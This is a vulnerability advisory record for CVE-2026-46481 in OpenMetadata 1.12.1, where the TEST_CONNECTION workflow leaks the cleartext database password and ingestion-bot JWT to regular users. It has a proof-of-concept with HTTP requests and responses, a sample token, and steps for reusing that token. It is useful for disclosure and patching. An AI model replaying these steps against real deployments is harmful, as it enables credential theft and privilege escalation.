{"id":"CVE-2026-46481","aliases":["GHSA-9vmh-whc4-7phg"],"url":"https://o3.security/vulnerability/CVE-2026-46481","summary":"OpenMetadata: TEST_CONNECTION workflow leaks ingestion-bot JWT and database password to regular users","details":"**This is not applicable if an application is configuring the Secrets Store to store credentials. Please make sure to follow the best practices when deploying in production**\nIn OpenMetadata 1.12.1, a non-admin SSO user can trigger a `TEST_CONNECTION` workflow for a Database Service and receive, in the HTTP 201 response of `POST /api/v1/automations/workflows`, both:\n\n- The cleartext database password in `request.connection.config.password`.\n- The ingestion bot JWT in `openMetadataServerConnection.securityConfig.jwtToken`.\n\nThe leaked ingestion-bot token can then be reused as `Authorization: Bearer <jwt>` to access sensitive service APIs (for example, `GET /api/v1/services/databaseServices/{id}?include=all`) with bot-level privileges.\n\nThis looks different from GHSA-pqqf-7hxm-rj5r, because it affects the `automations/workflows` TEST_CONNECTION endpoint on OpenMetadata 1.12.1, not the ingestion pipelines endpoints.\n\n---\n\nVersion / Product\n\n- Product: OpenMetadata (open source, Apache 2.0)\n- Version: 1.12.1\n  - GET /api/v1/system/version →\n    {\"version\":\"1.12.1\",\"revision\":\"618a2dc2ec8f70ffcd0378ee14ce92cb4f98f0c5\"}\n- Deployment: OpenMetadata server with SSO via Azure AD (OAuth), Oracle database service, secrets in DB secrets manager (`secretsManagerProvider: \"db\"`).\n\n---\n\nPreconditions\n\n- Authenticated SSO user with access to the UI.\n- User can open a Database Service and click “Test connection”.\n- No server admin role, no shell/DB access.\n\n---\n\nPoC (short)\n\n1) Login as a regular SSO user.\n\n2) In the UI go to:\n   Settings → Services → Database Services → utplrac_scan2_srvetel  \n   Open the connection tab and click “Test connection”.\n\n3) The browser sends:\n\nPOST /api/v1/automations/workflows HTTP/1.1\nHost: catalogodatos-test.utpl.edu.ec\nAuthorization: Bearer <Azure_AD_user_JWT>\nContent-Type: application/json\n\n{\n  \"name\": \"test-connection-Oracle-XXXX\",\n  \"workflowType\": \"TEST_CONNECTION\",\n  \"request\": {\n    \"connection\": {\n      \"config\": {\n        \"type\": \"Oracle\",\n        \"scheme\": \"oracle+cx_oracle\",\n        \"username\": \"qpro_gobierno_datos\",\n        \"password\": \"********\",\n        \"hostPort\": \"172.16.54.32:1521\",\n        ...\n      }\n    },\n    \"serviceType\": \"Database\",\n    \"connectionType\": \"Oracle\",\n    \"serviceName\": \"utplrac_scan2_srvetel\"\n  }\n}\n\nNote: in the request the password is masked as \"********\".\n\n4) The server responds with HTTP 201 and a body similar to:\n\n{\n  \"id\": \"5acd06f0-0db6-43b9-b0e0-e1574479bba7\",\n  \"workflowType\": \"TEST_CONNECTION\",\n  \"request\": {\n    \"connection\": {\n      \"config\": {\n        \"type\": \"Oracle\",\n        \"scheme\": \"oracle+cx_oracle\",\n        \"username\": \"qpro_gobierno_datos\",\n        \"password\": \"<REAL_PASSWORD_HERE>\",\n        \"hostPort\": \"172.16.54.32:1521\",\n        ...\n      }\n    },\n    \"serviceType\": \"Database\",\n    \"connectionType\": \"Oracle\",\n    \"serviceName\": \"utplrac_scan2_srvetel\",\n    \"secretsManagerProvider\": \"db\"\n  },\n  \"openMetadataServerConnection\": {\n    \"type\": \"OpenMetadata\",\n    \"hostPort\": \"http://openmetadata-server:8585/api\",\n    \"authProvider\": \"openmetadata\",\n    \"securityConfig\": {\n      \"jwtToken\": \"eyJraWQiOiJHYjM4OWEtOWY3Ni1nZGpzLWE5MmotMDI0MmJrOTQzNTYiLCJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJvcGVuLW1ldGFkYXRhLm9yZyIsInN1YiI6ImluZ2VzdGlvbi1ib3QiLCJyb2xlcyI6WyJJbmdlc3Rpb25Cb3RSb2xlIl0sImVtYWlsIjoiaW5nZXN0aW9uLWJvdEBvcGVuLW1ldGFkYXRhLm9yZyIsImlzQm90Ijp0cnVlLCJ0b2tlblR5cGUiOiJCT1QiLCJ1c2VybmFtZSI6ImluZ2VzdGlvbi1ib3QiLCJwcmVmZXJyZWRfdXNlcm5hbWUiOiJpbmdlc3Rpb24tYm90IiwiaWF0IjoxNzc0MDI2Nzg3LCJleHAiOjE3ODE4MDI3ODd9.DHLw4s...\"\n    },\n    ...\n  },\n  \"updatedBy\": \"<regular_user>\",\n  ...\n}\n\nKey points:\n- request.connection.config.password now contains the real Oracle DB password in cleartext.\n- openMetadataServerConnection.securityConfig.jwtToken contains a valid JWT for the ingestion-bot account (sub = \"ingestion-bot\", tokenType = \"BOT\").\n\n5) Reuse the leaked ingestion-bot JWT:\n\nGET /api/v1/services/databaseServices/f0382c0b-149e-4ca5-8844-d636c3437b9d?include=all HTTP/1.1\nHost: catalogodatos-test.utpl.edu.ec\nAuthorization: Bearer <leaked_ingestion-bot_JWT>\nAccept: application/json\n\nThe API returns the full database service including username and password, confirming bot-level access.\n\n---\n\nImpact / Severity\n\n- Any user who can run “Test connection” on a database service can:\n  - Recover the cleartext DB credentials.\n  - Recover a long‑lived ingestion-bot JWT.\n  - Act as ingestion-bot against the OpenMetadata API and access/modify services and metadata.\n\n**\n<img width=\"1256\" height=\"653\" alt=\"LOWLEVELTOKEN\" src=\"https://github.com/user-attachments/assets/e5b45edb-be51-493a-b4d0-25175cdf7cbc\" />\n<img width=\"194\" height=\"339\" alt=\"USERROL\" src=\"https://github.com/user-attachments/assets/04005616-4c7b-4b27-90f6-a8e1a974712b\" />\n<img width=\"972\" height=\"389\" alt=\"CLEARPOC\" src=\"https://github.com/user-attachments/assets/fdb26b59-782e-4a6b-a595-cdfb7ea68984\" />**","published":"2026-06-08T16:51:06.998Z","modified":"2026-08-12T03:51:30.008427111Z","cvss":{"score":8.3,"severity":"HIGH","vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},"epss":{"score":0.00241,"percentile":0.15484,"asOf":"2026-08-15"},"cisaKev":null,"exploitsKnown":0,"affectedPackages":[{"ecosystem":"Maven","name":"org.open-metadata:openmetadata-service","fixedVersion":"1.12.4"}],"fix":null,"references":[{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/46xxx/CVE-2026-46481.json"},{"type":"ADVISORY","url":"https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-9vmh-whc4-7phg"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-46481"},{"type":"PACKAGE","url":"https://github.com/open-metadata/OpenMetadata"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-08-12T03:51:30.008427111Z"}}